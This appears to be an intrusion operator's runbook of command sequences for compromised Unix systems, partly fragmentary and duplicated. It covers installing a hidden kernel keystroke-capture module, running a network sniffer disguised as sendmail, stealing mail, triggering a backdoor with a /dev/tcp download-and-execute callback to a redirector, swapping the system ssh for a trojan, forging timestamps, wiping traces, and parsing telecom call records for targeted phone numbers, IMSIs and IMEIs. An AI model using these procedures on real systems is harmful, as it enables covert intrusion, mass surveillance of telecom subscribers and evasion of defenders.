-cd /tmp/.scsi
cp /usr/sbin/modload ml
cp /usr/sbin/modinfo mi
### if running 32 AND 64 bit, upload 64 bit:
# 64 bit
-put /current/up/sparcv9/sum sum
# else 32 bit
-put /current/up/sum sum
-lt sum
### install it:
./ml sum
### make sure sum doesn't show up in modinfo:
./mi
### note size of sum for dd command:
-lt sum
### Run dd to zero out 'sum' binary so its contents can't be recovered from disk
after deletion
#
# say size of sum is 34364, need for count in dd
#
dd bs=1 count=34364 if=/dev/zero of=sum
-rm sum ml mi
### nothing should have logged:
##### NOPEN SUCTIONCHAR COMMANDS ########
[-suc]
Usage: -suc [get|<filename>] | [-s] <pid> [<pid>..] | blow | info | filter | fre
e | unhook
-suc info # shows if installed and bytes collected, max s and max c
-suc filter # set filters /current/etc/suctionchar.sample.conf
# locally to give pastable for -suc filter:
# make filter.conf file
/current/bin/suctionchar.genconf /current/etc/suctionchar.sample.filter.conf
# paste filter in one at a time from genconf bottom output until all filters
# in; filter saved message appears
-suc get # get data, decrypt, view
-suc blow # remove suctionchar
-suc -s pid [pid] # on the fly tracking of process to screen
-suc free # free memory of suctionchar data
-suc unhook # unhook any realtime process with -s to screen
# on target: to authenticate must run yyserv on target and
# /current/etc/suctionchar.authenticate locally
# authenticate by hand, our opbox time must be set exactly to authenticate
cp /bin/cat yyserv
-shell
echo $$ # notice pid
./yyserv # <ctrl><c> to exit
# 1 -- copy magic string from local authenticate window
# 3 -- copy first response from local authenticate window
# 5 -- copy second response from local authenticate window
info
OK
info
exit
# locally
cd /current/bin
./suctionchar.authenticate
# 2 -- place PID from echo $$ on target (-shell)
# 4 -- challenge= copy from yyserv output string inbetween first response string
# yyserv commands
# info - stats on collected sessions
info
# filt - reprogramming the filter rules it is running; intended to only be
# used with commands generated by genconf
filter
# copy filters one by one based on local genconf output
# file - writes out collected data to disk; file name in double quotes
# ex: "/tmp/filename"; should receive ERROR if wrong, WROTE to "/tmp/filename"
file "/tmp/.scsi/d
# in nopen window not running yyserv
-get /tmp/.scsi/d
-rm /tmp/.scsi/d
# locally
/current/etc/suctionchar.decrypt PATH/d outfile
# free - deallocates memory to store collected data; should always get OK
free
# hook - realtime snooping of existing processes
# ex: hook PID
# unho - unhooking any realtime hooked processes
# sets - set maximum bytes collected per session (MAX S =)
# setc - set maximum total bytes, across all collected sessions, used to
# store data in memory (MAX C =)
# unpa - unpatch itself from the kernel
# exit - send kill to yyserv
# when finished using yyserv manually, make sure cleaned up properly
ps -ef | grep yyserv
-lt
-rm yyserv
-cd /tmp
-rm /tmp/.scsi
######################################################
# STRIFEWORLD
######################################################
###
### IMPORTANT: make note of PID,PPID that strifeworld reports when you start it
and save it in opnotes
###
### man page:
cd /current/etc
nroff -man strifeworld.1
############ Start STRIFEWORLD #####################

### upload strifeworld as sendmail (or something else that might blend in)
-put /current/up/strifeworld sendmail
### Sniffing syntax:

#PATH=. E="port 23 and host (210.56.16.1 or 210.56.4.1)" C="-o/tmp/.nfs7254 -n.
-ihme0 -a3000 -b10000 -x100" sendmail
#PATH=. E="port 23" C="-o/tmp/.nfs7254 -n. -ihme0 -a3000 -b10000 -x100" sendmail
### Task mail:

#PATH=. E="port 25" C="-o/tmp/DIR -f(user1 user2) -ihme0 -a3000 -b100000 -j10000
000" sendmail
#PATH=. E="port 25" C="-o/tmp/DIR -f([â-zA-Z0-9_-](user1|user2|user3)@) -ihme0
-a3000 -b100000 -j10000000" sendmail
#PATH=. E="port 25" C="-o/platform/SUNW,SystemEngine/kernel/drv/scsi -f([â-zA-Z
0-9_-](user1|user2|user3)@) -ihme0 -a3000 -b100000 -j10000000 -x100 -l" sendmail
### Dump to hidden directory:

### to hide on a sparc system
-lt platform/SUNW,SystemEngine/kernel/drv
PATH=. E="port 23" C="-m -o/platform/SUNW,SystemEngine/kernel/drv/.scsi -n. -i i
prb0 -a3000 -b10000 -x100 -l" sendmail
### to hide file on an x86 system
-lt /platform/dvri86pc/kernel/drv
PATH=. E="port 23" C="-m -o/platform/dvri86pc/kernel/drv/.scsi -n. -i iprb0 -a30
00 -b10000 -x100 -l" sendmail
### make note of PID,PPID it echos back and document the command used to start
it
### verify it's running and hidden:

ps -ef | grep PID
cd /dev; ps -ef |grep " sendmail"
# or
echo "p\nq\n"|crash|grep sendmail # Should see sendmail with <PID>.
echo "p\nq\n"|crash|grep PID # Should see sendmail with <PID>.
############ Dump STRIFEWORLD #####################

### first, change local dir to either mailpull or sniffer:
-lcd /current/down/sniffer/TARGET_NAME.TARGET_IP
-lcd /current/down/mailpull/TARGET_NAME.TARGET_IP
### dump via built-in:

=swkill
### dump by hand:

### figure out sw PID and replace it in line below:
#A=PID export A; kill -USR1 $A; sleep 1;kill -USR2 $A;sleep 1; kill -USR1 $A;sle
ep 1;kill -USR2 $A
-ls -t /tmp
-get -l /tmp/file1 /tmp/file2
-rm /tmp/file1 /tmp/file2
-ls -t /tmp
### or if in a hidden directory (filename usually 'scsi'):
-ls /platform/SUNW,SystemEngine/kernel/drv/scsi
-ls /platform/dvri86pc/kernel/drv/scsi
-get -l FILENAME
cat /dev/null > FILENAME
-lt /platform/SUNW,SystemEngine/kernel/drv
-lt /platform/dvri86pc/kernel/drv
######### To grep headers from strifeworld mail collection: ##############

wc -l /tmp/file1 /tmp/file2
### while on target:
#P0=[12]?[0-5]?[0-9]+\\. ; P1=[0-9]+ ; P2=$P0$P0$P0$P0$P1 ; egrep -ni "($P2-$P2|
^To:|^From:|^Subject:|filename=)" /tmp/.nfs6218
### when done locally:
#P0=[12]?[0-5]?[0-9]+\\. ; P1=[0-9]+ ; P2=$P0$P0$P0$P0$P1 ; egrep -ni "($P2-$P2|
^To:|^From:|^Subject:|filename=)" /current/down/mailpull/TARGET_NAME.TARGET_IP
############# MAILGRAB ##############################
### Multiple mail pulls
-lcd /current/down/mailpull/TARGET_NAME.TARGET_IP
##### or use -chili
#
-chili -s 1 -l mm-dd-yyyy /var/mail USER1
## after down, check size locally
cd /current/down/mailpull/TARGET_NAME.TARGET_IP
# look at SA mail
-tail /var/adm/sulog
-ls /var/mail/USER
grep -n -i "^Subject: " /var/mail/USER
### Generic stuff

### SUBJECT/DATE/FROM/TO/E-MAIL ATTACHMENTS Normal...
#cd /var/mail; egrep '(^Subject:|^Date:|^From:|^To:|name=)' *
############### Get ready to cleanup ###################################

-setenv PATH=/tmp/WORK_DIR:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb
############- ZAP OUR AT JOB

at -l
at -r ### ; at -l
############ HEALTH CHECK #########################

### Run the following before pcleaning to baseline system health prior
### to end of op
w; date; last -80
/sbin/ps -elf; swap -l; uptime
ps -ef |grep " sendmail"
-pid
df -k
-ls -t /
-tail -50 /var/adm/messages
-ls -t /var/log /var/cron /var/adm
####
### Clean up and Bail
####
### Remove working dir, reset timestamp, rm touchfile, verify /usr and /tmp
### then
-cd /tmp
-rm /tmp/WORK_DIR
YES
-ls /tmp
####
## Kill off all remote nopen server processes...
####
-burn
BURN
#### Try reconnecting to make sure noserver died
###### End of user.mission; You're done!!!! ########################

###
### END USER.MISSION File user.mission.generic.COMMON
### (see also ../etc/user.mission.generic.COMMON)
###
### BEGIN File user.tool.pork.COMMON (see also ../etc/user.tool.pork.COMMON)
###
##### Triggering PORK #####
### Need 4 scripted windows
### Window 1: local, run pork client
### Window 2: nopen tunnel window on redirector
### Window 3: window to establish Nopen connection on redirector
### Window 4: packrat window
### Search/Replace stuff
### TARG_IP: box that has pork installed
### TARG_PORT: pork'ed port
### REDIR_IP: box hitting TARG_IP
### NETCAT_PORT: port to upload nopen
### NOPEN_PORT: port to start nopen on
### SPECIAL_SOURCE_PORT: source port of connection to pork
### (source port must be one of: 3, 51, 3854, 5671, 8213, 12634, 16798,
23247, 35139, 47923, 53246, 63201)
### TEMP_DIR: temp directory
### TIME_ADJ: time diff between local GMT and targ GMT (use 0 if no diff)
### (must be within 12 hrs)
mx
:%s/TARG_IP/TARG_IP/g
:%s/TARG_PORT/TARG_PORT/g
:%s/REDIR_IP/REDIR_IP/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/NOPEN_PORT/NOPEN_PORT/g
:%s/SPECIAL_SOURCE_PORT/SPECIAL_SOURCE_PORT/g
:%s/TEMP_DIR/TEMP_DIR/g
:%s/RAT_REMOTE_NAME/RAT_REMOTE_NAME/g
:%s/TIME_ADJ/TIME_ADJ/g
'x
### Window 2: Set up tunnel to talk to pork

-tunnel
r NETCAT_PORT
# If pork'ed service is TCP
l TARG_PORT TARG_IP TARG_PORT SPECIAL_SOURCE_PORT
# If pork'ed service is UDP
u TARG_PORT TARG_IP TARG_PORT SPECIAL_SOURCE_PORT
### Window 3: If need nopen to call back, set this up

-nrtun NOPEN_PORT
### Window 4: use packrat to prep Nopen

### Change the Nopen to upload if necessary
cd /current/up
packrat -z RAT_REMOTE_NAME morerats/noserver-3.0.3.1-i586-pc-linux-gnu NETCAT_PO
RT
### Window 1: Trigger pork

### Many ways this command may need to be adjusted to do callback, execute rat,
### etc., so all possibilities not outlined below
cd /current/bin
# If TCP
./client -t TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT "cd /tmp; mkdir TEM
P_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/REDIR_PORT > RAT_REMOTE_NAME.uu; uud
ecode RAT_REMOTE_NAME.uu; chmod 700 RAT_REMOTE_NAME; PATH=. S=1 D=-cREDIR_IP:NOP
EN_PORT RAT_REMOTE_NAME"
# If UDP
./client -u TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT "cd /tmp; mkdir TEM
P_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/REDIR_PORT > RAT_REMOTE_NAME.uu; uud
ecode RAT_REMOTE_NAME.uu; chmod 700 RAT_REMOTE_NAME; PATH=. S=1 D=-cREDIR_IP:NOP
EN_PORT RAT_REMOTE_NAME"
### Window 3: Should see Nopen connection if set up to callback

### If set up to listen, use this line
-nstun TARG_IP NOPEN_PORT
### Should be able to handle it from here...
###
### END File user.tool.pork.COMMON
### (see also ../etc/user.tool.pork.COMMON)
###
### BEGIN File user.tool.cursehydrant.COMMON (see also ../etc/user.tool.curseh
ydrant.COMMON)
###
################ CURSEHYDRANT #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.cursehydrant.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
### Prep the argfiles:

### make sure the files are ASCII and contain NO EMPTY LINES!!
### make sure the last line does not contain a null character at the end
### (vi the file, add a carriage return to the last line, then delete the em
pty
### line and save)
### "file" results:
### This will not work: ASCII text, with CRLF line terminators
### This WILL: ASCII text
cat arg*
file arg*
dos2unix arg*
file arg*
# if no data media is provided:
# locally, create a file of numbers to grep for with each number on a separate l
ine
# make sure there are NO EMPTY LINES!!!!
# Format of each type of argument:
# p123456789 - phone number
# s123456789 - IMSI
# e123456789 - IMEI
# c123/456 - Cell/LAC (no leading 0's)
vi /current/down/argfiles/argfile1.txt
########## To look at CDR directories try the following:

### Use the following commands to determine the location of current
### CDR data storage; Once you identify the location of the data, you'll
### use the head/tail commands to determine the date ranges being saved.
### These date ranges will be used as args in the cursehydrant commands.
### Typical file locations per host:
### Just check to see if files been removed
-lt /root
-vget /root/.sh_history
########################## liquidsteel:
### fc: 192.168.100.10
ls /share/a1338/ne_q3ic/nb/convert/output | wc -l
ls /share/a1338/ne_q3ic/nb/convert/output | head -10
ls /share/a1338/ne_q3ic/nb/convert/output | tail -10
-ls /share/a1338/ne_q3ic/nb/convert/output/*dF*
########################## sicklestar:
### about two weeks worth are kept in this directory:
### CDRCOL1: 10.211.4.1
### CDRCOL2: (if not on CDRCOL1) 10.211.4.2
ls /share/a1338/ne_q3ic/nb/convert/output | wc -l
ls /share/a1338/ne_q3ic/nb/convert/output | head -10
ls /share/a1338/ne_q3ic/nb/convert/output | tail -10
-ls /share/a1338/ne_q3ic/nb/convert/output/*dF*
### this is where they are backed up - this could be huge
ls /share/a1338/ne_q3ic/nb/convert/backup | head -10
ls /share/a1338/ne_q3ic/nb/convert/backup | tail -10
ls /share/a1338/ne_q3ic/nb/convert/backup/TODO | head -10
ls /share/a1338/ne_q3ic/nb/convert/backup/TODO | tail -10
ls /share/a1338/ne_q3ic/nb/convert/backup/ahmad | head -10
ls /share/a1338/ne_q3ic/nb/convert/backup/ahmad1 | head -10
ls /share/a1338/ne_q3ic/nb/convert/backup/ahmad/sulaman | wc -l
########################## CURSEHYDRANT #######################################
###############
################################################################################
###############
### Now, encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool not in PATH, change your PATH or insert full path in command
### to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTK
EY -b
EY -b
file argfile*.enc
### to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename
$i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
### Tips for running the CURSEHYDRANT 4.2.1
### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!
!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if addition
al
### passes are needed for the date range
### DO NOT use -o if also using >L: or >T: (mixed output corrupts the decryption
)
### By default, the new CH expects a cryptokey:
### to run in the clear, take out the -k KEY, add -w, replace -P with -p
### The phone list is deleted automatically now
### Suggested -z options:

### this looks in subdirs, so use caution in backup dir (can be good AND bad):
### Also circumvents "parameter list too long" problem with wildcards with 'ls'
-z "find /share/a1338/ne_q3ic/nb/convert/output -name '0506132*dF*' -print"
### works, but only for smaller ranges (command line arglist gets long)
-z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/05110[3-6]*dF*"
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1
.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more
2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS
TIME ALLOWS
######## Upload the parser (CURSEHYDRANT) and called it lvmkd
# put up the parser tool
-put /current/up/cursehydrant.v4.2.1.HP-UXB.11.00.targetsl lvmkd
# or
-put /mnt/zip/cursehydrant.v4.2.1.HP-UXB.11.00.targetsl lvmkd
##### Upload the encrypted phone list as nfskd, then run the parser:
############ argfile 1
-put /current/down/argfiles/argfile1.enc nfskd
export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output
-name '06071[3456]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cu
rsehydrant.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-name '06071[012]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cur
sehydrant.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-name '06070[89]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.curs
ehydrant.HOST.DDMonYY.enc2
-beep 15

-name '06070[67]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.curs
ehydrant.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3
sehydrant.HOST.DDMonYY.enc3
-beep 15
sehydrant.HOST.DDMonYY.enc3.more
#-beep 15
######
###### to run parser in the clear (unencrypted):
######
#-put /current/down/argfiles/argfile1.txt nfskd
#export ENV_ARGS='-w -z "find /share/a1338/ne_q3ic/nb/convert/output -name '0605
01*dF*' -print" -p ./nfskd'; ./lvmkd >T:/current/down/cdrhits.test
#-beep 15
######
###### to completely parse a range of files (no encryption & no particular numb
er to search):
######
#export ENV_ARGS='-o -w -d -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/06
051[1-2]*dF*"; ./lvmkd >T:/current/down/cdr.morenumbers
######
###### survey mode:
######
### checks for IMEIs that have more than one IMSI associated with it:
### to limit amount of memory used, replace "-x" with "-X numberBytes"
export ENV_ARGS='-x -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/outp
ut/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.
enc.surveyIMEI
### generates a list of Cell IDs associated with each MSC address:
### to limit amount of memory used, replace "-y" with "-Y numberBytes"
export ENV_ARGS='-y -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/outp
ut/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.
enc.surveyMSC
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc1
-o cdrhits.cursehydrant.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc2
-o cdrhits.cursehydrant.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
# or decrypt all at one time (once all are written fully)

cd /current/down
for i in cdrhits*enc* ; do n="ècho $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.
Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done
ls -latr cdr*txt*
######
###### If you need to stop the parser before it completes:
### Control-C the nopen window containing the parser command
### ps -ef |grep lvmkd
### if the parser command is still "running", then kill the process:
### kill -9 <PID>
### You'll still be able to decrypt the partially completed data pull
######
###### copy DECRYPTED data to media
######
ls -l cdr*txt*
mz
cp cdr*txt* /mnt/zip*/PROJECTNAME
ls -l /mnt/zip*/PROJECTNAME
uz
#####
##### clean up
#####
####### HP-UX (DO NOT BURN! DO NOT BURN! DO NOT BURN!)
-gs wearcup
####### Everything else...
-rm lvmkd nfskd
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
##### Either -burn off or if the target is HPUX, use -exit and let -wearcup do t
he cleanup
###
### END File user.tool.cursehydrant.COMMON
### (see also ../etc/user.tool.cursehydrant.COMMON)
###
### BEGIN File user.tool.dubmoat.COMMON (see also ../etc/user.tool.dubmoat.COM
MON)
###
##########################################
# DUBMOAT
##########################################
### Verify version on target:
uname -a
which ssh
ssh -V
### Preserve timestamps:
-ls -i /usr/bin/ssh
-ls -d /usr/bin
touch -r /usr/bin/ssh /tmp/.st
touch -r /usr/bin /tmp/.sb
-lt
### Create location (utmp~) for dubmoat logging:
-ls -t /var/run
cp /var/run/utmp /var/run/utmp~
### fix permisssions so any user can write to the file:
chmod 666 /var/run/utmp~
### Download original ssh:
-get /usr/bin/ssh
### Upload dubmoat and check the version:
-put /current/up/Ssh ssh
./ssh -V
### Cat our version over original to preserve inode:
cat /tmp/ssh > /usr/bin/ssh
-ls -i /usr/bin/ssh
/usr/bin/ssh -V
file /usr/bin/ssh
### Fix timestamps:
touch -r /var/run/utmp /var/run/utmp~
touch -r /var/run/utmp /var/run
touch -r /tmp/.st /usr/bin/ssh
touch -r /tmp/.sb /usr/bin
-ls -i /usr/bin/ssh
-ls -d /usr/bin/.
### Cleanup:
-rm .st .sb ssh
############################
# DUBMOAT COLLECTION
############################
-ls /var/adm/utmp*
-get -l /var/adm/utmp~
### Locally, extract the data from the encrypted file:

cd /current/down
/current/bin/ExtractData ./utmp > dub.TARGETNAME
### Verify the contents and take note of the file size field near
### the beginning of the output. Use that size to truncate the file
### in the next step:
cat dub.TARGETNAME
### Upload the tool used to truncate the dubmoat collection file
-put /current/bin/TruncateFileRemote dmt

chmod 700 dmt
### Using the first "FILE SIZE" field from the output above,
### truncate the most recent collection out of the file
-lt /var/adm/utmp~
./dmt /var/adm/utmp~ <FILESIZE>
-lt /var/adm/utmp~
-rm dmt
###
### END File user.tool.dubmoat.COMMON
### (see also ../etc/user.tool.dubmoat.COMMON)
###
### BEGIN File user.tool.cursehappy.COMMON (see also ../etc/user.tool.cursehap
py.COMMON)
###
################ CURSEHAPPY #########################
############### PARSING #######################################################
############
### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss
, wb
mx
:%s/HOST/HOST/g
'x
echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY
mz
#or
ls -altr

pty
### line and save)
### "file" results:
cat arg*
file arg*
dos2unix arg*
file arg*
ine
# s123456789 - IMSI
# e123456789 - IMEI

### These date ranges will be used as args in the cursehappy commands.
########################## wholeblue:
# tpmw01 10.3.4.55
# tpmw02 10.3.4.56
### verifies isb, khi, and lhr directories:
ls -ld /tp/med/datastore/collect/siemens_msc_*
ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr
ls -ld /tp/med/archive/collect/siemens_msc_*
ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr
### shows oldest and newest files in directories:
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10
# isbapro1 10.5.7.51
# nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -
10
-lt /u03/archive/collect
# newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
# old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
########################## editionhaze:
ls -latr /u06/saba/CDR/out/MS* | head -10
ls -latr /u06/saba/CDR/out/MS* | tail -10
ls -latr /u06/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## sicklestar:
### magnum: CURSEHAPPY not working on all SS .usd files :-(
### Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
### If none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
########################## CURSEHAPPY #########################################
###############
################################################################################
###############
EY -b
EY -b
file argfile*.enc
ls -l
file argfile*.enc
### encrypt the def files
for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl
-i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done
ls -l
file /current/up/cursedefs/*.enc
### encrypt the def files
### Tips for running the CURSEHAPPY 4.0

### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or
>>T: )!!!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if
additional
### DO NOT use -loglevel if also using >L: or >T: (mixed output corrupts
the decryption)
### The phone list is NOT deleted automatically in v3.2
### remove it between each run as a practice
### Useful options:
-n name of text file containing phone numbers
-files list of files to parse (can contain wildcards) optional - same a
s no option
-d output optional fields
-all all record output (no search performed)
-loglevel [#] level of info emitted via stderr:0,1,2,3
-def definition file (required)
-lb leave behind mode
Upload the parser (CURSEHAPPY) and called it crond
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/up/cursehappy4 crond
##### Upload the encrypted phone list as adm, modify each parser command to hav
e the
##### correct directory and date range of files to parse, then run the parser:
.enc)
2, etc.)
TIME ALLOWS
############ argfile 1
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.200
6071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1
-beep 15

6071[012]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-beep 15

6071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3
-beep 15

-beep 15
#############
############# for loglevel testing (local file should be ascii?)
#############
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -w e -loglevel 2 -d /CHAN
GEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.tes
t
-beep 15
######
######
cd /current/down
ls -latr cdr*enc*
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc1 -
o cdrhits.cursehappy.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c

cd /current/down
ls -latr cdr*txt*
######
### ps -ef |grep crond
### kill -9 <PID>
######
######
ls -l cdr*txt*
mz
uz
#####
##### clean up
#####
-rm crond adm adm~
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.cursehappy.COMMON
### (see also ../etc/user.tool.cursehappy.COMMON)
###
### BEGIN File user.tool.orleansstride.COMMON (see also ../etc/user.tool.orlea
nsstride.COMMON)
###
################ ORLEANSSTRIDE #########################
############### PARSING #######################################################
############
mx
:%s/HOST/HOST/g
'x
echo CRYPTKEY > /current/down/cryptkey.orleansstride.DDMonYY
mz
#or
ls -altr

pty
### line and save)
### "file" results:
cat arg*
file arg*
dos2unix arg*
file arg*
ine
# if searching for LACs and cell id's, use the format in the documentation:
# ex. - 410 01 95 18374
# if searching for phone numbers, use the normal format:
# ex. - 4837506
### For ORLEANSSTRIDE, the numbers must be in sorted order...the following loop
### will put all of the files in sorted order
for i in argfile*.txt; do sort -u -o `basename $i .txt`.sorted; done
### Make sure find the cryptTool...add to PATH if which fails...

### To encrypt one at a time...
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.sorted -o argfile1.enc -k CRY
PTKEY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.sorted -o argfile2.enc -k CRY
PTKEY -b
file argfile*.enc
### Loop to encrypt all the argfiles
for i in argfile*.sorted; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `ba
sename $i .sorted`.enc -k CRYPTKEY -b
file argfile*.enc

### These date ranges will be used as args in the orleansstride commands.
########################## sicklestar:
# magnum 10.140.0.68
ls -lart /archive/cdrc/*mob | head -10
ls -lart /archive/cdrc/*mob | tail -10
ls -lart /archive/cdrc/input/DONE/*mob | head -10
ls -lart /archive/cdrc/input/DONE/*mob | tail -10
### Tips for running the ORLEANSSTRIDE 1.0
>>T: )!!!!
additional
### The phone list is deleted automatically
######## Upload the parser (ORLEANSSTRIDE) and call it nscd

mkdir /tmp/.scsi
